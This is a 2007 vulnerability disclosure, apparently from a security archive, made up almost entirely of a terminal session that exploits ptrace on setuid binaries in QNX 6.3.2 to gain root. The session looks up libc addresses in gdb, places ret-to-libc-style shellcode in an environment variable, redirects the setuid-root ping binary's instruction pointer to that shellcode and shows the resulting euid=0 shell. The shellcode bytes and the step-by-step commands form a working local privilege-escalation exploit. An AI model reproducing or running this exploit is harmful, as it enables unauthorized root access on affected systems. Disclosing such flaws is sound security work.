SECURITYVULNS:DOC:15886
History: Jan 28, 2007 - 12:00 a.m.

ptrace suids local root.txt

2007-01-28 00:00:00
vulners.com
8

bash-2.05a$ uname -a
QNX muh 6.3.2 2006/03/16-14:19:50EST x86pc x86
bash-2.05a$ gdb -q /usr/bin/ping # we use some ret-to-libc-type-shellcode
(gdb) p system
$1 = {<text variable, no debug info>} 0xb031897c <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0xb0321ff8 <exit>
(gdb) q
bash-2.05a$ export SHELLCODE=`perl -e 'print "\xeb\x11\xb9\x7c\x89\x31\xb0\xff\xd1\x31\xc9\x51\xb9\xf8\x1f\x32\xb0\xff\xd1\xe8\xea\xff\xff\xffid;sh"'`
bash-2.05a$ ls -l /usr/bin/ping
-rwsrwxr-x 1 root root 36172 Dec 09 2004 /usr/bin/ping
bash-2.05a$ gdb -q /usr/bin/ping
(gdb) break main
Breakpoint 1 at 0x8049321
(gdb) r
Starting program: /usr/bin/ping
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.
(gdb) cont
Continuing.
(no debugging symbols found)…(no debugging symbols found)…[Switching to process 4157479]

Breakpoint 1, 0x08049321 in main ()
(gdb) x/1000sw $sp
[snip]
0x8047e1c: "SHELLCODE=л\021№|\2111°яС1ЙQ№ш\0372°яСикяяяid;sh"
[snip]
(gdb) x/sw 0x8047e1c+10
0x8047e26: "л\021№|\2111°яС1ЙQ№ш\0372°яСикяяяid;sh"
(gdb) set $eip=0x8047e26
(gdb) cont
Continuing.
uid=100(kokanin) gid=100(users) euid=0(root)

lol lol

sh: lol: not found